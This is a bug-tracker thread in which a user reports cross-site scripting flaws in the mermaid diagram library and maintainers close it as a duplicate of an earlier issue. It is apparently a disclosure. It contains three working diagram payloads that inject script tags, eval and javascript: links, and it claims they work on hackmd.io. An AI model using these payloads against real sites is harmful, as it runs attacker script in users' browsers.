cross site scripting in mermaid

[5alt]

Hi, I found XSS issues in mermaid. This affects all the projects that use mermaid.

There are three different ways to trigger.

The first one:

graph TD
B --> C{<script src=https://www.google-analytics.com/gtm/js?id=GTM-TQ6RV7G ></script>}

The second one:

graph LR;
    A-->B;
    click B callback "<script src=https://www.google-analytics.com/gtm/js?id=GTM-TQ6RV7G ></script>"

The third one(needs click, both nodes will work):

graph LR;
    alert`md5_salt`-->B;
    click alert`md5_salt` eval "Tooltip for a callback"
    click B "javascript:alert`salt`" "This is a tooltip for a link"

Loading

Here is an example that affects other projects which using mermaid.
hackmdio/codimd#1233

And all above three payload would work on hackmd.io

Hope you can fix soon!

[knsv]

Hi, I think this is a duplicate of #847. I will close this one. I will move your example there. If you disagree of the overlap reopen with a comment.

[5alt]

Hi,
#847 is only the 1st case in this issue, and there are three cases in this issue.

I don't think your fix of #847 will apply for the last case.

[ThePenguin1140]

We should extend the scope of #847 then.
@knsv has added your example to the issue so please watch it for any relevant updates. I will close this issue for now.